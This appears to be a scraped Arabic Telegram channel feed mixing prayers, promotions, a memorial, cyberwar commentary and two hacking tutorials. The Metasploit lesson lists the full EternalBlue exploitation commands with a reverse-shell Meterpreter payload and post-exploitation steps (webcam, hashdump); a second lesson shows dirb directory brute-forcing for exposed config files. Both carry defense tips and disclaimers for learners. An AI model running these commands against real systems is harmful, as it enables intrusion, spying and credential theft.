مجتمع تقنية المعلومات IT

إحتمال اوافق.. 🙂

ــ "فَسُبْحَانَ اللَّهِ حِينَ تُمْسُونَ وَحِينَ تُصْبِحُونَ وَلَهُ الْحَمْدُ فِي السَّمَاوَاتِ وَالْأَرْضِ وَعَشِيًّا وَحِينَ تُظْهِرُونَ" .

بالمناسبة كل واحد يدخل يعلق ويسوي ليك وعادة نشر ويرسلي صورة تفاعله خاص له 50 نجمة ❤️ @ZZZZ0

الكل يدخل يتفاعل مع المنشور حبايبي ❤️❤️👇 https://www.instagram.com/p/DXGgZNyCMl3/?igsh=MTFlaTNobW03MGIweA==

24 عاماً....... اليوم، وأنا أتم عاماً جديد، أقف وقفة فخر وتأمل أمام أحلامٍ لم تكن يوماً مجرد خيال، بل حقيقةً صغتُها بجهدي وعقلي في وقتٍ مبكر. في سنٍ يراه البعض بداية الطريق، أكرمني الله بأن أكون أباً لطفلين هما أغلى ما أملك، وأن أؤسس مملكتي الخاصة بمنزلٍ وسيارةٍ كانت يوماً طموحاً فصارت واقعاً ملموساً يعتبر لاشيء تحت يدي. لم يكن النجاح في صفقات التداول أو في عالم التقنية او في تليجرام سوى وسيلة لتحقيق هذه الاستقرار، واليوم أدخل عامي الرابع والعشرين وأنا أنظر إلى الأفق البعيد؛ عيني لا تكتفي بما حققت، بل ترنو إلى لقب 'الملياردير'. أنا لا أطارد المال لذاته، بل أطارد القمة التي تليق بمن بدأ مبكراً ونجح مبكراً. شكراً لكل تحدٍ جعلني أقوى، وشكراً لعائلتي التي هي وقودي للاستمرار. عامي الجديد ليس مجرد رقم، بل هو خطوة كبرى نحو الثروة والريادة. 24 عاماً من الإنجاز،والقادم هو عصر المليارات بإذن الله."

الذكرى السنوية الأولى في وفاة الزميل : توفيق النهاري رحل الكاتب وبقيت مؤلفاته رحل وترك فينا وجع وغصة لن تزول💔.. رحمة الله تغشاك ياتوفيق...

الذكرى السنوية الأولى في وفاة الزميل : توفيق النهاري رحل الكاتب وبقيت مؤلفاته رحل وترك فينا وجع وغصة لن تزول💔.. رحمة الله تغشاك ياتوفيق...

⚠️ دقيقة… قبل أن تفتح Google للترجمة. هناك بوت في تيليجرام يقوم بالترجمة فورًا بدون مواقع… وبدون تعقيد. فقط أرسل الكلمة أو الجملة وسيترجمها لك مباشرة لأي لغة 🌍 الأمر يستغرق ثانيتين فقط. الكثير يستخدمه يوميًا لكن قليل من يعرفه… جرّبه الآن بنفسك 👇 [@nxmp323BOT]

خواتم مباركة على الجميع 🌹

​🛡️ الدرس : احتراف أداة Metasploit 🛠️ ​الموضوع: كيف يتم استغلال الثغرات البرمجية والتحكم في الأنظمة (Step-by-Step)؟ ​━━━━━━━━━━━━━━━━━━ ​🔍 ما هي أداة Metasploit؟ ​هي أضخم منصة لاختبار الاختراق في العالم. تحتوي على آلاف "الأكواد الجاهزة" (Exploits) التي تستهدف ثغرات معينة في أنظمة Windows, Android, Linux، والسيرفرات. ​━━━━━━━━━━━━━━━━━━ ​📥 أولاً: تشغيل الأداة (The Setup) ​الأداة مدمجة في Kali Linux. للبدء، افتح الـ Terminal واكتب: ​1️⃣ تشغيل قاعدة بيانات الأداة: sudo msfdb init ​2️⃣ فتح واجهة الأداة: msfconsole ​━━━━━━━━━━━━━━━━━━ ​⚙️ ثانياً: شرح الاستخدام خطوة بخطوة (Practical Guide) ​سنطبق مثالاً تعليمياً على ثغرة شهيرة (مثل ثغرة في خدمة مشاركة الملفات SMB): ​الخطوة 1: البحث عن الثغرة داخل الأداة، نبحث عن الكود الخاص بالثغرة: search eternalblue ​الخطوة 2: اختيار الكود (Exploit) نختار الكود الذي وجدناه (مثلاً رقم 0): use exploit/windows/smb/ms17_010_eternalblue ​الخطوة 3: تحديد الهدف (Target) يجب أن نضع عنوان IP الجهاز الذي نفحصه: set RHOSTS 192.168.1.50 ​الخطوة 4: اختيار نوع "الباب الخلفي" (Payload) هنا نختار ماذا سيحدث بعد الاختراق (مثلاً فتح Terminal): set PAYLOAD windows/x64/meterpreter/reverse_tcp ​الخطوة 5: وضع عنوانك أنت (LHOST) ليعرف النظام أين سيرسل التحكم (ضع IP جهازك): set LHOST 192.168.1.10 ​الخطوة 6: التنفيذ (The Hack) الآن نطلق عملية الاستغلال: exploit ​━━━━━━━━━━━━━━━━━━ ​🚩 ماذا يحدث بعد الاختراق؟ (Meterpreter) ​بمجرد نجاح العملية، ستفتح لك جلسة تسمى Meterpreter، ومنها يمكنك: ​screenshot: أخذ لقطة لشاشة الضحية. ​webcam_stream: فتح الكاميرا مباشرة. ​hashdump: سحب جميع كلمات مرور الجهاز. ​shell: الدخول إلى الـ CMD الخاص بالجهاز والتحكم فيه بالكامل. ​━━━━━━━━━━━━━━━━━━ ​💡 كيف تحمي نفسك؟ (Defense) ​تحديث النظام: الثغرات التي تستخدمها هذه الأداة يتم إغلاقها فوراً عبر تحديثات Windows و Linux. ​جدار الحماية (Firewall): تأكد من تفعيل جدار الحماية لإغلاق المنافذ (Ports) غير المستخدمة. ​مكافح الفيروسات: برامج الحماية القوية تكتشف "الحمولات" (Payloads) التي ترسلها Metasploit وتقوم بحظرها. ​━━━━━━━━━━━━━━━━━━ ​⚠️ تنبيه تعليمي هام: هذا الشرح مخصص لمساعدة الطلاب والباحثين الأمنيين على فهم كيفية عمل الهجمات السيبرانية لتجنبها. استخدام هذه الأداة ضد أجهزة لا تملك تصريحاً خطياً لاختراقها يعتبر جريمة يعاقب عليها القانون. ​━━━━━━━━━━━━━━━━━━

🎯 ما هي أهداف الحرب الإلكترونية؟ الحرب الإلكترونية لم تعد مجرد اختراق مواقع، بل أصبحت أداة إستراتيجية تُستخدم لشل القدرات، إرباك القرار، والتأثير على مسار المعركة ميدانياً وإعلامياً. ━━━━━━━━━━━━━━━━━━ 🥇 🇮🇷 الأهداف الإيرانية السيبرانية 🔹 تعطيل الاتصال بالإنترنت داخل إسرائيل أو استهداف خدماتها الرقمية 🔹 نشر رسائل تعبئة أو تضليل إعلامي عبر اختراق منصات أو تسريب بيانات 🔹 الضغط على الخصوم عبر استهداف أنظمة حساسة (طاقة، مال، خدمات) 📌 لماذا يتم ذلك؟ ➡ إرباك الطرف الآخر وإشغاله داخلياً ➡ التأثير على الروح المعنوية ➡ إظهار القدرة على الرد رغم الضربات العسكرية التقليدية ━━━━━━━━━━━━━━━━━━ 🇺🇸🇮🇱 الأهداف الأمريكية والإسرائيلية السيبرانية 🔹 تعطيل أو تشويه أنظمة الاتصالات الإيرانية 🔹 ضرب البنية الإلكترونية الدفاعية قبل أي تصعيد عسكري 🔹 منع استخدام الإنترنت كأداة تنسيق عسكري أو تعبئة شعبية 🔹 زيادة الارتباك في منظومة القيادة والسيطرة الإيرانية ━━━━━━━━━━━━━━━━━━ 🔎 الخلاصة: الحرب الإلكترونية اليوم تُستخدم لشل التفكير قبل شل السلاح، ولإرباك القرار قبل تدمير الهدف. إنها معركة على المعلومات والاتصال بقدر ما هي معركة على الأرض.

​🛡️ درس: اكتشاف ملفات السيرفر المكشوفة (Directory Brute-forcing) 🛠️ ​الموضوع: كيف يتم العثور على ملفات النسخ الاحتياطي وإعدادات قاعدة البيانات؟ ​━━━━━━━━━━━━━━━━━━ ​🔍 ما هو اختراق سوء التكوين (Misconfiguration)؟ ​يحدث هذا عندما يترك مدير الموقع ملفات مهمة مثل backup.zip أو config.php أو مجلدات الإدارة مفتوحة على السيرفر دون حماية. المهاجم لا يحتاج لثغرة معقدة، بل يحتاج فقط إلى "تخمين" مكان هذه الملفات. ​━━━━━━━━━━━━━━━━━━ ​📥 أولاً: أداة Dirb (The Setup) ​هي أداة احترافية مدمجة في Kali Linux، تقوم بفحص الموقع وتجربة ملايين الاحتمالات لإيجاد المجلدات والملفات المخفية. ​1️⃣ تشغيل الأداة لفحص رابط معين: dirb http://target-website.com ​2️⃣ استخدام قاموس مخصص (Wordlist): dirb http://target-website.com /path/to/custom_wordlist.txt ​━━━━━━━━━━━━━━━━━━ ​⚙️ ثانياً: آلية عمل الفحص (How it Works) ​1️⃣ التخمين الذكي: تقوم الأداة بإرسال طلبات (Requests) للموقع مثل (/admin, /backup, /config.php, /db.sql) وتنتظر الرد. 2️⃣ تحليل استجابات HTTP: ​200 OK: الملف موجود ومكشوف! ​403 Forbidden: الملف موجود ولكنه محمي. ​404 Not Found: الملف غير موجود. 3️⃣ التحميل: بمجرد العثور على ملف مثل config.php.bak أو site.zip، يقوم المهاجم بتحميله للحصول على كلمات مرور قاعدة البيانات أو الكود المصدري للموقع. ​━━━━━━━━━━━━━━━━━━ ​💡 نصائح للحماية (Prevention) ​حماية المجلدات: قم بحماية مجلدات الإدارة (Admin panels) بكلمات مرور قوية. ​تعطيل استعراض المجلدات (Directory Listing): قم بتعطيل هذه الخاصية في إعدادات سيرفر (Apache/Nginx). ​حذف الملفات المؤقتة: تأكد من حذف ملفات النسخ الاحتياطي (.bak, .zip, .sql) من السيرفر بعد الانتهاء من العمل عليها. ​━━━━━━━━━━━━━━━━━━ ​⚠️ تنبيه تعليمي: هذا الدرس لتعليم خبراء الأمن كيفية حماية الأنظمة من خطأ سوء التكوين. محاولة البحث عن ملفات خاصة في مواقع الغير دون إذن رسمي هو جريمة سيبرانية. ​━━━━━━━━━━━━━━━━━━

ايش افضل مسلسل لهذا العام بالنسبه لك؟ أخبرنا رأيك في البوت👇🏻 @Sep21_Dhamar_Saeeda138BOT

ادخلوا صوتوا هنا ي شباب جبركم وكسوة العيد عليا 🙂

المتسابق : 𝑨𝒃𝒅𝒖𝒍𝒉𝒂𝒌𝒊𝒎 ツ

ادخلوا صوتوا هنا ي شباب جبركم وكسوة العيد عليا

ـــ عسى الله أن يمسح على قلوبنا قلبًا قلبًا، وينفخَ في أرواحِنا من لدنه الطمأنينة، ويعطِينا لحدِّ الرِّضا والغِنى والعزَّة، عسى الله أن يقوينا بثباتِ اليقين كلَّما واجهتنا عاصفةٌ هوجاء، عسى الله أن يدخل العافية والسرور إلى منازلنا وقلوبنا وديارِ أحبابنا.. ❤️